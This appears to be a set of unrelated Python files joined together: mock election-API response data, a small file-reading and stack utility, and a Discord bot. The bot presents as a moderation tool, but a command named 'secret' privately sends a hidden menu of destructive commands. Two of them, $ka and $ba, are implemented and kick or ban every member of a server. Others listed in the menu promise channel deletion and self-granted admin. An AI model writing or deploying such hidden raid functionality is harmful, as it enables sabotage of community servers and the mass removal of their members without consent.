players_set.add(y)
        return [[x for x in sorted(players_set) if lose[x] == i] for i in range(2)]
|
nilq/baby-python
|
python
|
# flake8: noqa
elections_resp = {
'kind': 'civicinfo#electionsQueryResponse',
'elections': [{
'id': '2000',
'name': 'VIP Test Election',
'electionDay': '2021-06-06',
'ocdDivisionId': 'ocd-division/country:us'
}, {
'id': '4803',
'name': 'Los Angeles County Election',
'electionDay': '2019-05-14',
'ocdDivisionId': 'ocd-division/country:us/state:ca/county:los_angeles'
}, {
'id': '4804',
'name': 'Oklahoma Special Election',
'electionDay': '2019-05-14',
'ocdDivisionId': 'ocd-division/country:us/state:ok'
}, {
'id': '4810',
'name': 'Oregon County Special Elections',
'electionDay': '2019-05-21',
'ocdDivisionId': 'ocd-division/country:us/state:or'
}, {
'id': '4811',
'name': 'Los Angeles County Special Election',
'electionDay': '2019-06-04',
'ocdDivisionId': 'ocd-division/country:us/state:ca/county:los_angeles'
}, {
'id': '4823',
'name': '9th Congressional District Primary Election',
'electionDay': '2019-05-14',
'ocdDivisionId': 'ocd-division/country:us/state:nc/cd:9'
}]
}
voterinfo_resp = {
'kind': 'civicinfo#voterInfoResponse',
'election': {
'id': '2000',
'name': 'VIP Test Election',
'electionDay': '2021-06-06',
'ocdDivisionId': 'ocd-division/country:us'
},
'normalizedInput': {
'line1': '900 North Washtenaw Avenue',
'city': 'Chicago',
'state': 'IL',
'zip': '60622'
},
'pollingLocations': [{
'address': {
'locationName': 'UKRAINIAN ORTHDX PATRONAGE CH',
'line1': '904 N WASHTENAW AVE',
'city': 'CHICAGO',
'state': 'IL',
'zip': '60622'
},
'notes': '',
'pollingHours': '',
'sources': [{
'name': 'Voting Information Project',
'official': True
}]
}],
'contests': [{
'type': 'General',
'office': 'United States Senator',
'level': ['country'],
'roles': ['legislatorUpperBody'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'James D. "Jim" Oberweis',
'party': 'Republican',
'candidateUrl': 'http://jimoberweis.com',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/Oberweis2014'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/Oberweis2014'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCOVqW3lh9q9cnk-R2NedLTw'
}]
}, {
'name': 'Richard J. Durbin',
'party': 'Democratic',
'candidateUrl': 'http://www.dickdurbin.com/home',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/dickdurbin'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/DickDurbin'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/SenatorDickDurbin'
}]
}, {
'name': 'Sharon Hansen',
'party': 'Libertarian',
'candidateUrl': 'http://www.sharonhansenforussenate.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/USSenate2014'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/nairotci'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'US House of Representatives - District 7',
'level': ['country'],
'roles': ['legislatorLowerBody'],
'district': {
'name': "Illinois's 7th congressional district",
'scope': 'congressional',
'id': 'ocd-division/country:us/state:il/cd:7'
},
'candidates': [{
'name': 'Danny K. Davis',
'party': 'Democratic',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/dkdforcongress'
}]
}, {
'name': 'Robert L. Bumpers',
'party': 'Republican'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Governor/ Lieutenant Governor',
'level': ['administrativeArea1'],
'roles': ['headOfGovernment'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Bruce Rauner/ Evelyn Sanguinetti',
'party': 'Republican',
'candidateUrl': 'http://brucerauner.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/BruceRauner'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/BruceRauner'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/117459818564381220425'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/brucerauner'
}]
}, {
'name': 'Chad Grimm/ Alexander Cummings',
'party': 'Libertarian',
'candidateUrl': 'http://www.grimmforliberty.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/grimmforgovernor'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/GrimmForLiberty'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/118063028184706045944'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UC7RjCAp7oAGM8iykNl5aCsQ'
}]
}, {
'name': 'Pat Quinn/ Paul Vallas',
'party': 'Democratic',
'candidateUrl': 'https://www.quinnforillinois.com/00/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/quinnforillinois'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/quinnforil'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/QuinnForIllinois'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Comptroller',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Judy Baar Topinka',
'party': 'Republican',
'candidateUrl': 'http://judybaartopinka.com',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/153417423039'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/ElectTopinka'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/118116620949235387993'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCfbQXLS2yrY1wAJQH2oq4Kg'
}]
}, {
'name': 'Julie Fox',
'party': 'Libertarian',
'candidateUrl': 'http://juliefox2014.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/154063524725251'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/JulieFox1214'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/+Juliefox2014'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCz2A7-6e0_pJJ10bXvBvcIA'
}]
}, {
'name': 'Sheila Simon',
'party': 'Democratic',
'candidateUrl': 'http://www.sheilasimon.org',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/SheilaSimonIL'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/SheilaSimonIL'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/SheilaSimonIL'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Secretary Of State',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Christopher Michel',
'party': 'Libertarian',
'candidateUrl': 'http://chrisforillinois.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/ChrisMichelforIllinois'
}]
}, {
'name': 'Jesse White',
'party': 'Democratic'
}, {
'name': 'Michael Webster',
'party': 'Republican',
'candidateUrl': 'http://websterforillinois.net/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/MikeWebsterIL'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/MikeWebsterIL'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/106530502764515758186'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/MikeWebsterIL'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Attorney General',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Ben Koyl',
'party': 'Libertarian',
'candidateUrl': 'http://koyl4ilattorneygeneral.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/Koyl4AttorneyGeneral'
}]
}, {
'name': 'Lisa Madigan',
'party': 'Democratic',
'candidateUrl': 'http://lisamadigan.org/splash',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/lisamadigan'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/LisaMadigan'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/106732728212286274178'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/LisaMadigan'
}]
}, {
'name': 'Paul M. Schimpf',
'party': 'Republican',
'candidateUrl': 'http://www.schimpf4illinois.com/contact_us?splash=1',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/136912986515438'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/Schimpf_4_IL_AG'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Treasurer',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Matthew Skopek',
'party': 'Libertarian',
'candidateUrl': 'http://www.matthewskopek.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/TransparentandResponsibleGoverment'
}]
}, {
'name': 'Michael W. Frerichs',
'party': 'Democratic',
'candidateUrl': 'http://frerichsforillinois.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/mikeforillinois'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/mikeforillinois'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/116963380840614292664'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCX77L5usHWxrr0BdOv0r8Dg'
}]
}, {
'name': 'Tom Cross',
'party': 'Republican',
'candidateUrl': 'http://jointomcross.com',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/JoinTomCross'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/JoinTomCross'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/117776663930603924689'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCDBLEvIGHJX1kIc_eZL5qPw'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'State House - District 4',
'level': ['administrativeArea1'],
'roles': ['legislatorLowerBody'],
'district': {
'name': 'Illinois State House district 4',
'scope': 'stateLower',
'id': 'ocd-division/country:us/state:il/sldl:4'
},
'candidates': [{
'name': 'Cynthia Soto',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Treasurer',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Maria Pappas',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Clerk',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'David D. Orr',
'party': 'Democratic',
'candidateUrl': 'http://www.davidorr.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/ClerkOrr'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/cookcountyclerk'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/TheDavidOrr'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Sheriff',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Thomas J. Dart',
'party': 'Democratic',
'candidateUrl': 'http://www.sherifftomdart.com/',
'channels': [{
'type': 'Twitter',
'id': 'https://twitter.com/TomDart'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Assessor',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Joseph Berrios',
'party': 'Democratic',
'candidateUrl': 'http://www.electjoeberrios.com/'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Board President',
'level': ['administrativeArea2'],
'roles': ['legislatorUpperBody'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Toni Preckwinkle',
'party': 'Democratic',
'candidateUrl': 'http://www.tonipreckwinkle.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/196166530417661'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/ToniPreckwinkle'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Arnold Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Bridget Anne Mitchell',
'party': 'Democratic',
'candidateUrl': 'http://mitchellforjudge.com',
'email': 'bridget@mitchellforjudge.com'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Reyes Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Diana Rosario',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Howse, Jr. Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Caroline Kate Moreland',
'party': 'Democratic',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/judgemoreland'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Neville, Jr. Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'William B. Raines',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Egan Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Daniel J. Kubasiak',
'party': 'Democratic',
'candidateUrl': 'http://www.judgedank.org/',
'email': 'Info@JudgeDanK.org'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Connors Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Kristal Rivers',
'party': 'Democratic',
'candidateUrl': 'http://rivers4judge.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/193818317451678'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/Rivers4Judge'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - McDonald Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Cynthia Y. Cobbs',
'party': 'Democratic',
'candidateUrl': 'http://judgecobbs.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/1387935061420024'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/judgecobbs'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Lowrance Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Thomas J. Carroll',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Veal Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Andrea Michele Buford',
'party': 'Democratic',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/ElectJudgeBufordForTheBench'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Burke Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Maritza Martinez',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Felton Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': "Patricia O'Brien Sheahan",
'party': 'Democratic',
'candidateUrl': 'http://sheahanforjudge.com/'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'CONSTITUTION BALLOT PROPOSED AMENDMENT TO THE 1970 ILLINOIS CONSTITUTION (1)',
'referendumSubtitle': '"NOTICE THE FAILURE TO VOTE THIS BALLOT MAY BE THE EQUIVALENT OF A NEGATIVE VOTE, BECAUSE A CONVENTION SHALL BE CALLED OR THE AMENDMENT SHALL BECOME EFFECTIVE IF APPROVED BY EITHER THREE-FIFTHS OF THOSE VOTING ON THE QUESTION OR A MAJORITY OF THOSE VOTING IN THE ELECTION. (THIS IS NOT TO BE CONSTRUED AS A DIRECTION THAT YOUR VOTE IS REQUIRED TO BE CAST EITHER IN FAVOR OF OR IN OPPOSITION TO THE PROPOSITION HEREIN CONTAINED.) WHETHER YOU VOTE THIS BALLOT OR NOT YOU MUST RETURN IT TO THE ELECTION JUDGE WHEN YOU LEAVE THE VOTING BOOTH".',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15966',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'CONSTITUTION BALLOT PROPOSED AMENDMENT TO THE 1970 ILLINOIS CONSTITUTION (2)',
'referendumSubtitle': '"NOTICE THE FAILURE TO VOTE THIS BALLOT MAY BE THE EQUIVALENT OF A NEGATIVE VOTE, BECAUSE A CONVENTION SHALL BE CALLED OR THE AMENDMENT SHALL BECOME EFFECTIVE IF APPROVED BY EITHER THREE-FIFTHS OF THOSE VOTING ON THE QUESTION OR A MAJORITY OF THOSE VOTING IN THE ELECTION. (THIS IS NOT TO BE CONSTRUED AS A DIRECTION THAT YOUR VOTE IS REQUIRED TO BE CAST EITHER IN FAVOR OF OR IN OPPOSITION TO THE PROPOSITION HEREIN CONTAINED.) WHETHER YOU VOTE THIS BALLOT OR NOT YOU MUST RETURN IT TO THE ELECTION JUDGE WHEN YOU LEAVE THE VOTING BOOTH".',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15967',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'STATEWIDE ADVISORY QUESTION (1)',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15738',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'STATEWIDE ADVISORY QUESTION (2)',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15739',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'STATEWIDE ADVISORY QUESTION (3)',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15740',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}],
'state': [{
'name': 'Illinois',
'electionAdministrationBody': {
'name': 'Illinois State Board of Elections',
'electionInfoUrl': 'http://www.elections.il.gov',
'votingLocationFinderUrl': 'https://ova.elections.il.gov/PollingPlaceLookup.aspx',
'ballotInfoUrl': 'https://www.elections.il.gov/ElectionInformation/OfficesUpForElection.aspx?ID=2GLMQa4Rilk%3d',
'correspondenceAddress': {
'line1': '2329 S Macarthur Blvd.',
'city': 'Springfield',
'state': 'Illinois',
'zip': '62704-4503'
}
},
'local_jurisdiction': {
'name': 'CITY OF CHICAGO',
'sources': [{
'name': 'Voting Information Project',
'official': True
}]
},
'sources': [{
'name': '',
'official': False
}]
}]
}
polling_data = [{
'passed_address': '900 N Washtenaw, Chicago, IL 60622',
'polling_locationName': 'UKRAINIAN ORTHDX PATRONAGE CH',
'polling_address': '904 N WASHTENAW AVE',
'polling_city': 'CHICAGO',
'polling_state': 'IL',
'polling_zip': '60622',
'source_name': 'Voting Information Project',
'source_official': True,
'pollingHours': '',
'notes': ''},
{
'passed_address': '900 N Washtenaw, Chicago, IL 60622',
'polling_locationName': 'UKRAINIAN ORTHDX PATRONAGE CH',
'polling_address': '904 N WASHTENAW AVE',
'polling_city': 'CHICAGO',
'polling_state': 'IL',
'polling_zip': '60622',
'source_name': 'Voting Information Project',
'source_official': True,
'pollingHours': '',
'notes': ''
}]
|
nilq/baby-python
|
python
|
def readFile(path):
try:
with open(path, "r") as file:
return file.read()
    except OSError:
print(
"{Error: Failed to load file. File doesn't exist or invalid file path, "
+ "Message: Please check arguments or import strings.}"
)
return ""
class Stack:
def __init__(self):
self._stack = []
def isEmpty(self):
return len(self._stack) == 0
def peek(self):
return self._stack[-1] if not self.isEmpty() else None
def push(self, element):
self._stack.append(element)
def pop(self):
return self._stack.pop() if not self.isEmpty() else None
def get(self, index):
return self._stack[index] if index < len(self._stack) and index >= 0 else None
def __len__(self):
return len(self._stack)
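# Illustrative usage sketch (an addition, not part of the original module):
# read a file with readFile and reverse its lines with Stack. The file name
# "example.txt" is a placeholder.
if __name__ == "__main__":
    text = readFile("example.txt")  # returns "" when the file cannot be read
    stack = Stack()
    for line in text.splitlines():
        stack.push(line)
    while not stack.isEmpty():
        print(stack.pop())  # lines come back out in reverse order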
|
nilq/baby-python
|
python
|
import discord
from discord.ext import commands
from discord.ext.commands import Bot
import asyncio
import time
import logging
import random
import googletrans
prefix = "$"
BOT_TOKEN = "token-goes-here"
LOG_CHANNEL_ID = 0  # placeholder: set to the ID of the channel used for logging
intents = discord.Intents.default()
intents.members = True
client = commands.Bot(command_prefix=prefix, intents=intents)
client.remove_command("help")
@client.event
async def on_ready():
print ("Bot is now online!")
@client.event
async def on_guild_join(guild):
    print("Joining the server: {0}".format(guild.name))
@client.command(pass_context=True)
async def clear(ctx, amount=1000):
await ctx.channel.purge(limit=amount)
@client.command(pass_context=True)
async def ping(ctx):
channel = ctx.message.channel
t1 = time.perf_counter()
await channel.trigger_typing()
t2 = time.perf_counter()
embed=discord.Embed(title=None, description='Ping: {}'.format(round((t2-t1)*1000)), color=0x2874A6)
await channel.send(embed=embed)
@client.command(pass_context=True)
async def avatar(ctx, member : discord.Member = None):
if member == None:
member = ctx.author
memavatar = member.avatar_url
avEmbed = discord.Embed(title = f"{member.name}'s Avatar")
avEmbed.set_image(url = memavatar)
await ctx.send(embed = avEmbed)
@client.command()
async def say(ctx, *, msg=None):
if msg is not None:
await ctx.send(msg)
await ctx.message.delete()
@client.command(aliases=['tr'])
async def translate(ctx, lang_to, *args):
lang_to = lang_to.lower()
if lang_to not in googletrans.LANGUAGES and lang_to not in googletrans.LANGCODES:
raise commands.BadArgument("Invalid language to translate text to")
text = ' '.join(args)
translator = googletrans.Translator()
text_translated = translator.translate(text, dest=lang_to).text
await ctx.send(text_translated)
@client.command(pass_context=True)
async def userinfo(ctx, member: discord.Member=None):
channel = ctx.message.channel
if member is None:
await channel.send('Please input a valid user.')
else:
await channel.send("**The user's name is: {}**".format(member.name) + "\n**The user's ID is: {}**".format(member.id) + "\n**The user's highest role is: {}**".format(member.top_role) + "\n**The user joined at: {}**".format(member.joined_at) + "\n**The user's account creation date is: {}**".format(member.created_at))
@client.command(pass_context=True)
async def kick(ctx, member: discord.Member=None):
author = ctx.message.author
channel = ctx.message.channel
if author.guild_permissions.kick_members:
if member is None:
await channel.send("Please input a valid user.")
else:
await channel.send("Die, **{}**".format(member.name))
await member.kick()
else:
await channel.send("I bet you don't have enough permissions.")
@client.command(pass_context=True)
async def ban(ctx, member: discord.Member=None):
author = ctx.message.author
channel = ctx.message.channel
if author.guild_permissions.kick_members:
if member is None:
await channel.send('Please input a valid user.')
else:
await channel.send("Die **{}**.".format(member.name))
await member.ban()
else:
await channel.send("Where are your permissions?!")
@client.command(pass_context=True)
async def mute(ctx, member: discord.Member):
guild = ctx.guild
mutedRole = discord.utils.get(guild.roles, name="Muted")
if not mutedRole:
mutedRole = await guild.create_role(name="Muted")
for channel in guild.channels:
await channel.set_permissions(mutedRole, speak=False, send_messages=False, read_message_history=True, read_messages=False)
await member.add_roles(mutedRole)
await ctx.send(f"Muted {member.mention}.")
await member.send(f"Silence, {guild.name}.")
@client.command(pass_context=True)
async def unmute(ctx, member: discord.Member):
mutedRole = discord.utils.get(ctx.guild.roles, name="Muted")
await member.remove_roles(mutedRole)
await ctx.send(f"Unmuted {member.mention}.")
    await member.send(f"Make sure you won't say bullshit again, {ctx.guild.name}")
@client.command(pass_context=True)
async def secret(ctx):
member = ctx.message.author
embed = discord.Embed(
colour = discord.Colour.blue()
)
embed.set_author(name='Bot Commands')
    embed.add_field(name='$ba', value='Bans everybody from the server (bot needs banning perms and needs to have a higher role than users)', inline=False)
embed.add_field(name='$dc', value='Deletes all channels (bot needs manage channels perms)', inline=False)
embed.add_field(name='$ka', value='Kicks everyone from the server (bot needs kicking perms)', inline=False)
embed.add_field(name='$a', value='Gives you admin role (bot needs administrator)', inline=False)
embed.add_field(name='$invite', value='Sends an invite link of the bot', inline=False)
embed.add_field(name='$createchannel', value='makes x amount of channels defined by you', inline=False)
embed.add_field(name='$createrole', value='makes x amount of roles defined by you', inline=False)
embed.add_field(name='$ping', value='Gives ping to client (expressed in ms)', inline=False)
embed.add_field(name='$kick', value='Kicks specified user', inline=False)
embed.add_field(name='$ban', value='Bans specified user', inline=False)
embed.add_field(name='$userinfo', value='Gives information of a user', inline=False)
embed.add_field(name='$clear', value='Clears an X amount of messages', inline=False)
embed.add_field(name='$dm', value='Sends a direct message containing hi to the author', inline=False)
embed.add_field(name='$serverinfo', value='Gives information about the server', inline=False)
embed.add_field(name='$avatar', value="Shows avatar of selected user")
embed.add_field(name='$tr', value="Translates text. Example: $tr english hola")
    embed.add_field(name='$mute', value="Mutes a user.")
    embed.add_field(name='$unmute', value="Unmutes a user.")
embed.add_field(name='$say', value="Say a specific message.")
await member.send(embed=embed)
@client.command()
async def serverinfo(ctx):
name = str(ctx.guild.name)
description = str(ctx.guild.description)
owner = str(ctx.guild.owner)
id = str(ctx.guild.id)
region = str(ctx.guild.region)
memberCount = str(ctx.guild.member_count)
icon = str(ctx.guild.icon_url)
date = str(ctx.guild.created_at)
embed = discord.Embed(
title=name + " Server Information",
description=description,
color=discord.Color.blue()
)
embed.set_thumbnail(url=icon)
embed.add_field(name="Owner", value=owner, inline=True)
embed.add_field(name="Server ID", value=id, inline=True)
embed.add_field(name="Region", value=region, inline=True)
embed.add_field(name="Member Count", value=memberCount, inline=True)
embed.add_field(name="Created On", value=date, inline=True)
await ctx.send(embed=embed)
@client.command(pass_context=True)
async def ka(ctx):
guild = ctx.message.guild
    logchannel = client.get_channel(LOG_CHANNEL_ID)
for member in list(ctx.message.guild.members):
try:
await guild.kick(member)
print ("User " + member.name + " has been kicked")
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.add_field(name="User kicked", value=f'{member.name}')
await logchannel.send(embed=embed)
except:
pass
print ("Action Completed: Kicked everyone.")
@client.command(pass_context=True)
async def ba(ctx):
guild = ctx.message.guild
    logchannel = client.get_channel(LOG_CHANNEL_ID)
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print ("User " + member.name + " has been banned")
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.add_field(name="User banned", value=f'{member.name}')
await logchannel.send(embed=embed)
except:
pass
